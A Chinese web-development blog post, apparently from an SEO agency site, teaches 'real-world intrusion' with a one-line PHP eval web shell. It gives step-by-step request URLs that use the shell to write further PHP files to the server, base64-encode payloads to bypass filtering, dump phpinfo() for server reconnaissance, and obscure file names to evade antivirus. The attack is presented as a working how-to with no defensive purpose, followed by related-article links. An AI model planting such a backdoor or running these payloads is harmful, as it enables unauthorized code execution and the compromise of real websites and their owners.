咨询,就免费赠送域名与服务器,咨询热线:18210983909当前位置: 主页 > 建站知识 > 网站建设开发 > PHP语言开发学习教程 >
内容合作
联系我们
西安SEO网站优化建设公司咨询 建站咨询 西安SEO网站关键词排名优化公司 优化咨询
电话咨询:18210983909
E-mail:15210415824@qq.com
地址: 北京市海淀区尚东数字山谷A区1号楼

由PHP木马程序带来的实战入侵

作者/整理:SEO网站优化 点击量:次 来源:互联网 日期: 2017-04-01

在PHP文件中插入下边这句话,程序顷刻间就成能变身为木马程序。

test.php文件内容:

<?php eval($_GET['c']);?>

访问:http://www.qichunquanze.cn/test.php?c=你想用的各种PHP语句体

比如我的使用方式是这样的:

http://www.qichunquanze.cn/test.php?c=fputs(fopen("hacker.php","w"),"Hello,Hacker!");

这个是时候就会在根目录下生成了一个hacker.php文件,打开它发现有 Hello,Hacker! 文本。

http://www.qichunquanze.cn/hacker.php 它只是保存的是纯字符串而以。

由PHP木马程序带来的实战入侵

哪么高级一点的做法是,将hacker.php文件内容输出为PHP语言执行的语句,哪如何做呢?接下来看我的做法。

我们要将http://www.qichunquanze.cn/test.php?c=fputs(fopen("hacker.php","w"),"Hello,Hacker!");这个url中的Hello,Hacker!这段文本替换成php语句才能达到目的,直接在URL中写成我们要将http://www.qichunquanze.cn/test.php?c=fputs(fopen("hacker.php","w"),"<?php echo 'Hello,Hacker!' ; ?>"); 发现会出现报错,哪是因为不能适别PHP的左右尖括号造成的,哪么我们改进一下代码

$hackerstring = "<?php echo 'Hello,Hacker!' ; ?>";

我们只有将$hackerstring这段文本生成到hacker.php文件中 <?php echo 'Hello,Hacker!' ; ?>才能算此方法通过测试。

echo base64_encode($hackerstring);

<?php echo 'Hello,Hacker!' ; ?>经过base64_encode转码得到的结果如下:

获得结果:PD9waHAgZWNobyAnSGVsbG8sSGFja2VyISc7Pz4=

我们将这段代码代入下面程式:

fputs(fopen("hacker.php","w"),base64_decode('PD9waHAgZWNobyAnSGVsbG8sSGFja2VyISc7Pz4='));

浏览器中访问:

http://www.qichunquanze.cn/test.php?c=fputs(fopen("hacker.php","w"),base64_decode('PD9waHAgZWNobyAnSGVsbG8sSGFja2VyISc7Pz4='));

运行后,去根目录找到hacker.php文件,内容测试如下图所示。

由PHP木马程序带来的实战入侵

此时算是大功告成了,你就可运行http://www.qichunquanze.cn/hacker.php文件了如下图

由PHP木马程序带来的实战入侵

为了测试进一步复杂一点,为弄清服务器主机上的配置,也可以有phpinfo()语句写到hacker.php文件里,做法是替换原有的 Hello,Hacker! 内容,详细写法是

$hackerstring = "<?php phpinfo() ; ?>";

echo base64_encode($hackerstring);获得字符串 'PD9waHAgcGhwaW5mbygpOz8+'

在URL中将其代入,然后在浏览器运行:

http://www.qichunquanze.cn/test.php?c=fputs(fopen("hacker.php","w"),base64_decode('PD9waHAgcGhwaW5mbygpOz8+'));

这时hacker.php文件 生成结果内容是:<?php phpinfo() ; ?>

浏览器运行http://www.qichunquanze.cn/hacker.php,显示的内容如下:

由PHP木马程序带来的实战入侵

出现这个界面,你就知道服务器的一切了。

还有改进的地方

fputs(fopen("hacker.php","w"),base64_decode('PD9waHAgcGhwaW5mbygpOz8+'));

把文件名hacker.php也转成base64编码吧,这样加强陷弊性。

上边这句代码居然逃过了病毒程序的追杀。这上边的实例只是个宿影,其它语言也一样的道理,大家要学会举一反三,多推敲推敲,你的技能才会得提高!

噢,耶,这次测试入侵成功了吧!

一起分享讨论技术吧,请关注"IT自由职业者",将会更多精彩送上。

Php框架之slim3.0应用小实例 PHP知识 多功能php绿色集成环境,700个PHP版
请写一段 PHP 代码,确保多个进程同 使用php完成常见的“文件上传”功 php文件输入输出学习
PHP文件及数据编码转换解决乱码问 PHP学习之ThinkPHP5.0框架搭建 PHP里文件的查找方式及写法
php开发教学:文件上传的步骤 PDF文件(图片格式存储文字)直转 连接网络或PHP文件失败?2017新版如
路径正确下,Eclipse读取txt文件仍失 phpcms前台显示“栏目禁止投稿”的 浅谈:在PHP中该怎样防止SQL注入?
smarty3从入门到精通详解 php数据类型详解 PHP常用函数小全
PHP中iconv函数解决utf-8和gb2312编码转 方法总结:PHP页面跳转到另一个页 php中json_decode()和json_encode()
php中sql注入漏洞例子以及修复sql注 php在程序中将网页生成word文档并提 intval()和(int)转换使用与区别
PHPMyadmin 配置文件详解 PHP正则表达式语法汇总 PHP正则表达式常用例子
PHP二维数组排序的具体方法详解 PHP读取Excel文件类的具体应用 PHP如何判断文件、目录是否存在?
php生成随机验证码 PHP如何在服务器下实现多session并发 什么是 MVC 模式?
PHP批量将数据插入MySQL数据库 PHP连接MYSQL详解 PHP删除数组中的空值
十大PHP最佳安全实践 PHP本身的安全配置详解 PHP安全配置详解
漫谈PHP的安全性 PHP安全之Register Globals PHP安全之错误报告
PHP实现的Mysql读写分离 php json_encode 中文 utf-8 乱码 php无刷新上传文件代码